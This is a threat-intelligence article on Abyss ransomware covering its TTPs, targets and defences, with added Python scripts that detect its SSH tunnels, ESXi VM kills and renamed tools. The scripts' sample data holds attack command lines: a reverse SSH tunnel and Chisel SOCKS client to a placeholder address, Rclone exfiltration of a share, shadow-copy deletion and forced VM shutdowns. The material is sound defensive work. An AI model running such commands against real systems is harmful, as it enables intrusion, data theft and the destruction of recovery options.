Abyss Ransomware (also known as Abyss Locker) emerged as a significant cybersecurity threat in 2023, and its activity has continued into 2024 and early 2025. This ransomware targets both Windows and Linux systems, particularly VMware ESXi environments, and employs sophisticated double-extortion tactics. This involves not only encrypting victims' data but also exfiltrating sensitive information and threatening to release it publicly on a data leak site (DLS) if the ransom is not paid. This dual approach significantly increases the pressure on victims, making Abyss a high-severity threat. It is believed to have originated from the HelloKitty ransomware source code and shares similarities with Babuk ransomware.
Abyss Locker first appeared in March 2023. Its codebase is reportedly derived from Babuk ransomware, a notorious group whose source code was leaked in 2021. This leak allowed various actors to develop new ransomware variants, and Abyss is one of the more sophisticated examples. Further analysis also indicates similarities in the encryption methods used by Abyss Locker and HelloKitty ransomware.
The evolution of Abyss is marked by its relatively rapid development and adoption of advanced techniques. While initially observed in early 2023, it quickly gained notoriety for its double-extortion tactics and for a Linux variant capable of targeting VMware ESXi servers. This cross-platform capability expanded its potential victim pool. There have been multiple versions; the primary differences between Windows versions 1 and 2 are the ransom message (which identifies itself as version 2) and the TOR address. The Linux version (no version 1 has been found) is specifically designed for VMware.
Abyss appears to be a private operation rather than a widespread Ransomware-as-a-Service (RaaS) offering, which makes attribution and tracking more challenging for security researchers. Staying informed about the latest threat intelligence is crucial.
Abyss Ransomware employs a combination of sophisticated tactics, techniques, and procedures (TTPs) to maximize its impact. Its operation can be broken down into several key stages:
Initial Access: Abyss gains initial access to networks through a variety of methods, including:
* Phishing Emails: Socially engineered emails containing malicious attachments or links.
* Exploitation of Vulnerabilities: Targeting unpatched systems and software, particularly in VPN appliances (e.g., SonicWall vulnerability CVE-2021-20038) and exposed servers.
* Weak SSH Configurations: Brute-forcing or exploiting weak SSH credentials, especially in Linux environments.
* VPN Access: Using VPN access to gain entry to the internal network.
Credential Harvesting:
* Targeting backup appliances (Veeam).
* Using a modified 'Veeam-Get-Creds.ps1' PowerShell script to steal credentials stored in Veeam.
* Dumping the Windows SAM and Security registry hives.
Defense Evasion: Abyss actively attempts to disable security controls:
* Disabling Windows Defender: Modifying registry keys to disable Windows Defender.
* EDR Agent Removal: Stopping or removing EDR agents, often using the SYSTEM account.
* BYOVD (Bring Your Own Vulnerable Driver): Using legitimate but vulnerable drivers (e.g., 'UpdateDrv.sys' from Zemana Anti-Logger, 'ped.sys' from Process Explorer, '3ware.sys') to disable security controls at the kernel level.
* Deploying AV/EDR killer executables (SophosAV.exe, auSophos.exe).
Command and Control (C2): A distinctive feature of Abyss is its heavy reliance on SSH/SOCKS tunneling for persistent C2:
* Tunneling Tools: Uses tools like Chisel (often renamed to 'apache2') and native SSH.
* Deployment on Critical Devices: Deploys tunnels on critical network infrastructure (ESXi servers, Windows servers, VPN appliances, NAS devices) to maintain access.
* Windows SSH Tunneling Backdoor:
  * Installs an OpenSSH-based tool as a persistent service ("WMI Helper Agent") via 'deploy443.ps1'.
  * Uses 'WinSW-x64.exe' (renamed to 'wmihelper.exe') to masquerade as a legitimate process.
  * Configuration stored in 'wmihelper.xml' (C2 IP, SSH key, port forwarding).
* ESXi SSH Tunneling:
  * Compromises ESXi hosts via VPN and pivoting.
  * Enables SSH if disabled and uses the native SSH binary.
  * Establishes a reverse SSH tunnel to the C2 server.
* NAS Device Tunneling:
  * Accesses the NAS web interface (DSM) with the 'admin' account.
  * Enables the SSH service.
  * Creates a backdoor user ('support') with privileged access.
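The Windows backdoor described above (a WinSW-wrapped SSH client installed as the "WMI Helper Agent" service, with its C2 address, key and port forwarding in 'wmihelper.xml') can be hunted by auditing service wrapper configs on endpoints. The script below is an added example written for this article; it is not code from the article, from the threat actor, or from the WinSW project. The sample XML is constructed: the element names follow the public WinSW schema, while the service name is the one the article reports and every path, key file and address (203.0.113.10 is a documentation-range address) is invented.

```python
"""Audit a WinSW-style service wrapper config for an SSH reverse tunnel.

Added example for this article; not code from the article or from any Abyss
sample. SAMPLE_TUNNEL_XML is constructed to resemble what a 'wmihelper.xml'
wrapping ssh.exe could contain; element names follow the public WinSW schema,
every value is invented (203.0.113.10 is a documentation-range address).
"""
import xml.etree.ElementTree as ET

# Binaries that deserve a second look when wrapped as a Windows service.
SSH_CLIENTS = {"ssh.exe", "plink.exe", "putty.exe"}
# Service display names the article attributes to the Abyss backdoor.
KNOWN_MASQUERADE_NAMES = {"wmi helper agent"}

SAMPLE_TUNNEL_XML = """<service>
  <id>wmihelper</id>
  <name>WMI Helper Agent</name>
  <description>Windows Management Instrumentation helper</description>
  <executable>C:\\ProgramData\\wmi\\ssh.exe</executable>
  <arguments>-N -o StrictHostKeyChecking=no -o ServerAliveInterval=30 -i C:\\ProgramData\\wmi\\id_rsa -R 0.0.0.0:443:127.0.0.1:3389 tunnel@203.0.113.10 -p 443</arguments>
</service>
"""

# Constructed benign config for comparison: a Java app wrapped as a service.
SAMPLE_BENIGN_XML = """<service>
  <id>reportsvc</id>
  <name>Internal Report Service</name>
  <executable>C:\\Program Files\\Java\\bin\\java.exe</executable>
  <arguments>-jar C:\\apps\\reports.jar --port 8080</arguments>
</service>
"""


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _flag_after(argv, flag):
    """Values following every occurrence of a flag, e.g. every '-R' target."""
    return [argv[i + 1] for i, a in enumerate(argv[:-1]) if a == flag]


def audit_winsw_config(xml_text: str) -> dict:
    """Return structured findings for one WinSW service definition."""
    root = ET.fromstring(xml_text)

    def text(tag):
        return (root.findtext(tag) or "").strip()

    name, executable = text("name"), text("executable")
    # WinSW accepts a single <arguments> string or repeated <argument> elements.
    argv = text("arguments").split()
    argv += [(e.text or "").strip() for e in root.findall("argument")]

    forwards = _flag_after(argv, "-R")          # reverse port forwards
    key_files = _flag_after(argv, "-i")         # private key files
    remote = next((a.split("@", 1)[1] for a in argv if "@" in a), None)

    findings = []
    if _basename(executable) in SSH_CLIENTS:
        findings.append(("high", f"service wraps an SSH client: {executable}"))
    if forwards:
        findings.append(("high", "reverse port forward(s): " + ", ".join(forwards)))
    if "-N" in argv:
        findings.append(("medium", "-N set: session runs no command, tunnel only"))
    if key_files:
        findings.append(("medium", "key-based auth with " + ", ".join(key_files)))
    if "StrictHostKeyChecking=no" in argv:
        findings.append(("low", "host key verification disabled"))
    if name.lower() in KNOWN_MASQUERADE_NAMES:
        findings.append(("high", f"service name matches reported backdoor: {name!r}"))

    return {
        "service_name": name,
        "executable": executable,
        "reverse_forwards": forwards,
        "remote_host": remote,
        "findings": findings,
        "suspicious": any(sev == "high" for sev, _ in findings),
    }


if __name__ == "__main__":
    for label, xml in (("tunnel", SAMPLE_TUNNEL_XML), ("benign", SAMPLE_BENIGN_XML)):
        report = audit_winsw_config(xml)
        print(f"[{label}] suspicious={report['suspicious']} remote={report['remote_host']}")
        for sev, msg in report["findings"]:
            print(f"  {sev:6} {msg}")
```

In practice the function would be run over every `*.xml` that sits next to a WinSW-shaped executable in a service's ImagePath; the service name check only catches the name reported here, whereas the SSH-client and `-R` checks generalize to any renamed wrapper.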
Lateral Movement: Uses compromised credentials and tools like PsExec and Impacket (SMBExec, ATExec) to move laterally within the network.
File/Folder Exclusion: It avoids encrypting critical system files and folders, to avoid detection, speed up encryption, and keep the system functional enough for the victim to pay.
Exfiltration: Uses 'Rclone' (often renamed to 'ltsvc.exe') to exfiltrate data to cloud providers like AWS and BackBlaze. It often uses XML filters to target specific file types.
Encryption:
* Windows: Encrypts files and appends the ".abyss" extension (version 1 uses a random 5-letter extension).
* Linux (ESXi): Encrypts files and appends the ".crypt" extension. Specifically targets virtual machines, using esxcli commands to identify and shut down running VMs.
* Uses the ChaCha encryption method.
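The ESXi activity described in the C2 section (enabling SSH, then opening a reverse SSH tunnel) and in the encryption section (esxcli commands to list and shut down running VMs) leaves a trail in the host's shell log. The script below is an added example written for this article, not code from the article or from any Abyss sample. The log lines are constructed in the shape of ESXi's /var/log/shell.log; the commands are real ESXi syntax, while timestamps, PIDs, world IDs and the address 203.0.113.10 are invented.

```python
"""Hunt an ESXi shell log for SSH enablement, reverse tunnels and VM kills.

Added example for this article, not code from it or from any Abyss sample.
SAMPLE_SHELL_LOG is constructed in the shape of /var/log/shell.log
('<timestamp> shell[<pid>]: [<user>]: <command>'); timestamps, PIDs,
world IDs and the address 203.0.113.10 are invented.
"""
import re
from collections import Counter

SAMPLE_SHELL_LOG = """\
2025-01-15T02:13:07Z shell[2101234]: [root]: vim-cmd hostsvc/enable_ssh
2025-01-15T02:14:30Z shell[2101240]: [root]: ssh -fN -o StrictHostKeyChecking=no -i /tmp/.k -R 20443:127.0.0.1:22 tunnel@203.0.113.10
2025-01-15T02:20:01Z shell[2101251]: [root]: esxcli vm process list
2025-01-15T02:20:45Z shell[2101252]: [root]: esxcli vm process kill --type=force --world-id=2100993
2025-01-15T02:21:02Z shell[2101253]: [root]: esxcli vm process kill --type=force --world-id=2101004
2025-01-15T02:25:40Z shell[2101260]: [root]: ls /vmfs/volumes/datastore1/
2025-01-15T09:00:00Z shell[2101300]: [root]: esxcli storage filesystem list
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$"
)

# Category -> pattern over the command text. First match wins per line.
RULES = [
    ("ssh_enabled", re.compile(
        r"vim-cmd\s+hostsvc/enable_ssh|/etc/init\.d/SSH\s+start"
        r"|ruleset-id\s+sshServer\b.*--enabled\s+true")),
    ("reverse_ssh_tunnel", re.compile(r"\bssh\b.*\s-R\s")),
    ("vm_enumeration", re.compile(r"esxcli\s+vm\s+process\s+list\b")),
    ("vm_kill", re.compile(r"esxcli\s+vm\s+process\s+kill\b")),
    # Artifact names the article attributes to the Linux variant.
    ("ransom_artifact", re.compile(r"\.README_TO_RESTORE\b|\.crypt\b")),
]
WORLD_ID_RE = re.compile(r"--world-id[= ](\d+)")


def hunt_shell_log(text: str) -> list:
    """Return one hit dict per matching command, in log order."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a shell.log command line
        cmd = m.group("cmd")
        for category, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"ts": m.group("ts"), "user": m.group("user"),
                             "category": category, "cmd": cmd})
                break
    return hits


def summarize(hits: list) -> dict:
    """Counts per category plus the world IDs of forcibly killed VMs."""
    counts = Counter(h["category"] for h in hits)
    killed = [w for h in hits if h["category"] == "vm_kill"
              for w in WORLD_ID_RE.findall(h["cmd"])]
    # Tunnel in, enumerate VMs, then kill them so the locked disk files can be
    # encrypted: flag the host when all three steps are present.
    chain = all(counts.get(c) for c in ("reverse_ssh_tunnel", "vm_enumeration", "vm_kill"))
    return {"counts": dict(counts), "killed_world_ids": killed, "vm_shutdown_chain": chain}


if __name__ == "__main__":
    hits = hunt_shell_log(SAMPLE_SHELL_LOG)
    for h in hits:
        print(f"{h['ts']} {h['category']:18} {h['cmd']}")
    print(summarize(hits))
```

Forwarding shell.log off the host (the article recommends central log collection) matters here, because the same access that runs these commands can also clear the local log.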
Ransom Note:
* Windows: Drops a ransom note named "WhatHappened.txt".
* Linux: Creates ransom notes with the ".README_TO_RESTORE" extension.
Data Leak Site (DLS): A TOR-based site used for negotiation and for threatening to leak stolen data.
Volume Shadow Copy Deletion: Deletes volume shadow copies to prevent data recovery.
Abyss Ransomware has demonstrated a broad targeting scope, impacting organizations across various industries and geographic regions.
Geographic Distribution: While the United States has been the most heavily targeted country, reported incidents also span across Europe, North America, South America, and Asia.
Targeted Industries:
* Industrials (especially Manufacturing): This sector is frequently targeted, likely due to its critical role in supply chains and the potential for significant disruption.
* Finance: Financial data is valuable, and these organizations usually have the funds to pay.
* Healthcare: High-value target due to sensitive patient data and the critical nature of healthcare services.
* Information Technology: Targeted for their access to client data and potential for cascading attacks through supply chains.
* Professional/Scientific/Technical Services: These organizations often possess valuable intellectual property.
* Construction
The targeting of these sectors suggests motivations beyond purely financial gain, potentially including espionage and disruption of critical infrastructure.
Several notable attack campaigns have been attributed to Abyss Locker:
March 2023: Emergence of Abyss Locker, with early reports indicating double-extortion attacks.
Mid-2023: Reports of a data leak site, although later analysis suggests the site is primarily for negotiation.
2024: Continued activity, with attacks targeting Windows and Linux systems.
Four Eye Clinics: Red Packet Security reported an attack on "Four Eye Clinics", demonstrating the real-world impact on patient care and data.
Protecting against Abyss Ransomware requires a multi-layered approach combining preventative measures, detection capabilities, and robust incident response planning.
Prevent:
* Secure Edge Devices: Limit exposure of management interfaces, block unnecessary protocols, implement Geo-IP restrictions, and use firewalls with deep packet inspection.
* Network Segmentation: Utilize VLANs and firewalls to isolate critical systems and limit inter-VLAN communication.
* Strong Password Policies & MFA: Enforce strong, unique passwords and multi-factor authentication (MFA) for all user accounts, especially privileged ones.
* Credential Protection: Implement solutions like Privileged Access Management (PAM), Credential Guard (for Windows), and regularly audit registry access to prevent credential theft.
* Backup Security: Maintain regular, offline, and immutable backups with AES-256 encryption. Store backups in isolated VLANs.
* Endpoint Protection: Deploy and maintain robust endpoint detection and response (EDR) solutions. Remove or restrict the use of vulnerable drivers and enforce strict application control policies.
* Patch Management: Implement a rigorous patch management process, prioritizing known exploited vulnerabilities. Patch within 7 days or immediately for critical vulnerabilities. Conduct regular vulnerability scans.
* Security Awareness Training: Train employees to recognize and avoid phishing attempts and other social engineering tactics.
* Access Governance: Implement Role-Based Access Control (RBAC) and MFA. Consider using authentication silos to limit the impact of compromised credentials.
Detect:
* Monitor Edge Devices: Monitor for unusual SSH/SOCKS tunneling activity and suspicious DNS traffic.
* Monitor ESXi and NAS: Monitor for unauthorized SSH access, configuration changes, and attempts to tamper with logs.
* Log Forwarding: Forward logs (Sysmon on Windows, Auditd/Osquery on Linux) to a SIEM for centralized analysis.
* Backup Tampering Detection: Implement alerts for any unauthorized access or modification of backup systems.
* Threat Intelligence: Stay informed about the latest TTPs and IOCs associated with Abyss Locker through threat intelligence feeds.
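Once Sysmon data reaches the SIEM, the renamed tooling this article reports (Chisel as 'apache2', Rclone as 'ltsvc.exe', WinSW as 'wmihelper.exe') and the shadow-copy deletion can be picked out of process-creation events. The script below is an added example written for this article, not code from the article or from any Abyss sample. The events are constructed JSON lines of the kind a log shipper forwards for Sysmon Event ID 1; the on-disk file names are the ones the article reports, while the OriginalFileName values, command lines and the address 203.0.113.10 are invented.

```python
"""Flag masquerading binaries and shadow-copy deletion in Sysmon Event ID 1.

Added example for this article, not code from it or from any Abyss sample.
SAMPLE_EVENTS is constructed: file names on disk come from the article,
OriginalFileName values and command lines are invented, and 203.0.113.10
is a documentation-range address.
"""
import json
import ntpath

# Renamed tools the article reports, keyed by the name seen on disk, with
# command-line fragments that betray what the binary really is.
KNOWN_RENAMES = {
    "apache2": ("chisel", ("client", "R:")),        # Chisel reverse SOCKS client
    "apache2.exe": ("chisel", ("client", "R:")),
    "ltsvc.exe": ("rclone", ("copy", "sync", "--filter-from")),  # Rclone exfiltration
    "wmihelper.exe": ("winsw", ("install", "start")),            # WinSW service wrapper
}

SAMPLE_EVENTS = r"""
{"EventID":1,"Image":"C:\\ProgramData\\apache2.exe","OriginalFileName":"-","CommandLine":"apache2.exe client 203.0.113.10:443 R:socks"}
{"EventID":1,"Image":"C:\\ProgramData\\ltsvc.exe","OriginalFileName":"rclone.exe","CommandLine":"ltsvc.exe copy C:\\Shares\\Finance remote:bucket/finance --filter-from C:\\ProgramData\\filter.txt"}
{"EventID":1,"Image":"C:\\Windows\\System32\\vssadmin.exe","OriginalFileName":"VSSADMIN.EXE","CommandLine":"vssadmin.exe delete shadows /all /quiet"}
{"EventID":1,"Image":"C:\\Windows\\System32\\svchost.exe","OriginalFileName":"svchost.exe","CommandLine":"svchost.exe -k netsvcs"}
{"EventID":1,"Image":"C:\\ProgramData\\wmi\\wmihelper.exe","OriginalFileName":"WinSW.exe","CommandLine":"wmihelper.exe install"}
"""


def analyze_event(ev: dict) -> list:
    """Reasons to alert on one process-creation event (empty list if none)."""
    image = ntpath.basename(ev.get("Image", "")).lower()
    original = ev.get("OriginalFileName", "").lower()
    cmdline = ev.get("CommandLine", "")
    reasons = []
    # 1. The PE version info says the file was built under a different name.
    if original not in ("", "-", "?") and original != image:
        reasons.append(f"name mismatch: on disk {image!r}, OriginalFileName {original!r}")
    # 2. A name reported as a renamed tool, confirmed by its command line.
    if image in KNOWN_RENAMES:
        tool, markers = KNOWN_RENAMES[image]
        if any(m in cmdline for m in markers):
            reasons.append(f"{image!r} invoked like {tool}: {cmdline}")
    # 3. Shadow copy deletion, the recovery-inhibition step the article lists.
    lowered = cmdline.lower()
    if image == "vssadmin.exe" and "delete" in lowered and "shadows" in lowered:
        reasons.append("volume shadow copies deleted: " + cmdline)
    return reasons


def scan_events(jsonl: str) -> list:
    """Run analyze_event over JSON-lines input; return alerts in input order."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 1:
            continue  # only process-creation events carry these fields
        reasons = analyze_event(ev)
        if reasons:
            alerts.append({"image": ev["Image"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["image"])
        for reason in alert["reasons"]:
            print("  -", reason)
```

The name-mismatch rule is the durable one: it catches any renamed binary that still carries version info, whatever the attacker calls it, while the KNOWN_RENAMES table only covers the names reported for this campaign.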
Govern:
* Access Governance: Strictly enforce RBAC, MFA, and the principle of least privilege.
* Patch Management: Establish a formal patch management program with clear timelines and responsibilities. Consider also micropatching.
* Privileged Identity Management (PIM): Require the use of one-time passwords for privileged account access and conduct regular audits of privileged accounts.
* Incident Response Plan: Develop and test a well-defined incident response plan to handle ransomware attacks effectively.
Abyss Ransomware represents a significant and evolving threat in the cybersecurity landscape. Its sophisticated TTPs, including double-extortion tactics, cross-platform capabilities, and focus on critical infrastructure, make it a formidable adversary. Organizations must adopt a proactive, multi-layered defense strategy encompassing prevention, detection, and robust incident response planning to mitigate the risk posed by Abyss and similar ransomware threats. Staying informed about the latest threat intelligence and continuously adapting security measures are crucial for staying ahead of this evolving threat.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.